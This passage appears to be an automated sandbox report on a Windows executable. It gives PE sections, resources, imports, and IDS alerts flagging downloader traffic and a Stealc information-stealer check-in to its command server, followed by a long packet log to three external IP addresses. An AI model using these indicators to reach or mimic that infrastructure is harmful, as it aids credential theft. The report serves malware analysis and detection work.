                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x504c00x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x16c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x4d97c0x4da00f23eca72aeb40bd493c99e3c5898e5fcFalse0.8528457125603864data7.554746178588047IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x4f0000x206a0x2200dee7693ea1e5b0cd14cc49a8837fde33False0.36086856617647056data5.42580181902609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x520000x3db0d80x6c00c0bff7590bd22299e89866135e054a81unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x42e0000x11d300x11e00e1f56f6d7a7dbf3885ed2a59e9829bb0False0.5192307692307693data5.47358067303111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_CURSOR0x4391a80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                            RT_CURSOR0x4392d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                            RT_CURSOR0x43b8a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                            RT_ICON0x42e6f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.36300639658848616
                                                            RT_ICON0x42f5980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.5018050541516246
                                                            RT_ICON0x42fe400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5835253456221198
                                                            RT_ICON0x4305080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.619942196531792
                                                            RT_ICON0x430a700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.3522514071294559
                                                            RT_ICON0x431b180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.3524590163934426
                                                            RT_ICON0x4324a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.40070921985815605
                                                            RT_ICON0x4329700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8131663113006397
                                                            RT_ICON0x4338180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8506317689530686
                                                            RT_ICON0x4340c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.836405529953917
                                                            RT_ICON0x4347880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.7528901734104047
                                                            RT_ICON0x434cf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.804045643153527
                                                            RT_ICON0x4372980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8337242026266416
                                                            RT_ICON0x4383400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8422131147540983
                                                            RT_ICON0x438cc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8590425531914894
                                                            RT_DIALOG0x43c9200x82data0.7615384615384615
                                                            RT_STRING0x43c9a80x4a8data0.436241610738255
                                                            RT_STRING0x43ce500xe6data0.5608695652173913
                                                            RT_STRING0x43cf380x806data0.4230769230769231
                                                            RT_STRING0x43d7400x576data0.4434907010014306
                                                            RT_STRING0x43dcb80x782data0.4214360041623309
                                                            RT_STRING0x43e4400x6aedata0.4298245614035088
                                                            RT_STRING0x43eaf00x656data0.43773119605425403
                                                            RT_STRING0x43f1480x5dadata0.43324432576769023
                                                            RT_STRING0x43f7280x604data0.4357142857142857
                                                            RT_GROUP_CURSOR0x43b8800x22data1.088235294117647
                                                            RT_GROUP_CURSOR0x43c7500x14data1.25
                                                            RT_GROUP_ICON0x4391300x76dataTurkmenTurkmenistan0.6779661016949152
                                                            RT_GROUP_ICON0x4329080x68dataTurkmenTurkmenistan0.7115384615384616
                                                            RT_VERSION0x43c7680x1b8COM executable for DOS0.5681818181818182
                                                            DLLImport
                                                            KERNEL32.dllDeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, SetEvent, GetModuleHandleW, SetProcessPriorityBoost, GlobalAlloc, GetFileAttributesA, GetTimeFormatW, GetConsoleAliasW, GetModuleFileNameW, SetLastError, GetProcAddress, SetFileAttributesA, UpdateResourceA, Process32Next, RegisterWaitForSingleObject, AddAtomW, FoldStringA, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, WriteConsoleOutputAttribute, GetVersionExA, WriteProcessMemory, GetFileSize, GetConsoleAliasExesLengthA, LoadLibraryA, GetCommandLineW, LCMapStringW, LCMapStringA, GetLastError, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
                                                            USER32.dllGetClassLongW, GetMonitorInfoW
                                                            GDI32.dllGetBoundsRect
                                                            ADVAPI32.dllEnumDependentServicesW
                                                            Language of compilation systemCountry where language is spokenMap
                                                            TurkmenTurkmenistan
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-11T06:57:00.801518+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730172.67.179.207443TCP
                                                            2024-12-11T06:57:02.574995+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.1980TCP
                                                            2024-12-11T06:57:07.856254+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973292.255.57.8980TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 11, 2024 06:56:58.932987928 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:56:58.933027029 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:56:58.933118105 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:56:58.942660093 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:56:58.942678928 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.162250996 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.162369967 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.208044052 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.208060980 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.208257914 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.208317995 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.211968899 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.259341955 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.801537037 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.801603079 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.801616907 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.801629066 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.801656961 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.801675081 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.820604086 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.820622921 CET44349730172.67.179.207192.168.2.4
                                                            Dec 11, 2024 06:57:00.820631027 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:00.820669889 CET49730443192.168.2.4172.67.179.207
                                                            Dec 11, 2024 06:57:01.131237030 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:01.250628948 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:01.250716925 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:01.250897884 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:01.370127916 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574893951 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574912071 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574930906 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574976921 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574990988 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.574995041 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.575001955 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.575014114 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.575025082 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.575042963 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.575062037 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.575253010 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.575265884 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.575299025 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.695890903 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.695965052 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.695969105 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.696007967 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.700011969 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.700057030 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.766586065 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.766683102 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.766823053 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.766875029 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.770593882 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.770656109 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.772109032 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.772171021 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.772214890 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.772258043 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.780584097 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.780659914 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.780679941 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.780724049 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.788896084 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.788970947 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.789005041 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.789057970 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.797380924 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.797446966 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.797482014 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.797523975 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.805644035 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.805721045 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.805731058 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.805778980 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.814075947 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.814137936 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.814168930 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.814222097 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.822350979 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.822431087 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.822458029 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.822503090 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.830708027 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.830770969 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.830890894 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.830944061 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.839063883 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.839114904 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.839165926 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.839210987 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.847053051 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.847132921 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.847158909 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.847210884 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.886219025 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.886271954 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.886298895 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.886346102 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.958841085 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.958889961 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.958966970 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.959011078 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.961091042 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.961134911 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.961194992 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.961240053 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.965857983 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.965908051 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.965986967 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.966031075 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.970554113 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.970597982 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.970657110 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.970700979 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.975301027 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.975368023 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.975397110 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.975435972 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.980056047 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.980089903 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.980098963 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.980129957 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.984687090 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.984756947 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.984807968 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.984849930 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.989389896 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.989447117 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.989515066 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.989557981 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.994112015 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.994163990 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.994240999 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.994277000 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.998837948 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.998904943 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:02.998966932 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:02.999007940 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.003566980 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.003644943 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.003673077 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.003715992 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.008308887 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.008361101 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.008368969 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.008405924 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.013035059 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.013077974 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.013139963 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.013161898 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.017743111 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.017801046 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.017857075 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.017901897 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.021380901 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.021433115 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.021488905 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.021541119 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.025079966 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.025156975 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.025173903 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.025223017 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.028605938 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.028660059 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.028711081 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.028763056 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.032322884 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.032380104 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.032413006 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.032458067 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.150836945 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.150978088 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.151015997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.151068926 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.152641058 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.152703047 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.152740955 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.152789116 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.156297922 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.156352997 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.156378031 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.156424999 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.159905910 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.160017014 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.160113096 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.163510084 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.163579941 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.163630962 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.163678885 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.167207956 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.167249918 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.167273045 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.167299986 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.170797110 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.170855999 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.170896053 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.171036005 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.174391031 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.174444914 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.174499035 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.174547911 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.178071976 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.178128958 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.178149939 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.178201914 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.181653023 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.181706905 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.181760073 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.181817055 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.185281038 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.185334921 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.185395956 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.185448885 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.188952923 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.189012051 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.189018011 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.189064026 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.192548990 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.192599058 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.192630053 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.192676067 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.196182966 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.196264029 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.196286917 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.196333885 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.200051069 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.200090885 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.200103998 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.200134993 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.203458071 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.203516960 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.203548908 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.203589916 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.207076073 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.207123041 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.207171917 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.207216978 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.210813999 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.210843086 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.210896015 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.210925102 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.214338064 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.214411020 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.214449883 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.214493990 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.217967987 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.218018055 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.218080997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.218122959 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.221651077 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.221690893 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.221721888 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.221751928 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.225217104 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.225290060 CET4973180192.168.2.4176.113.115.19
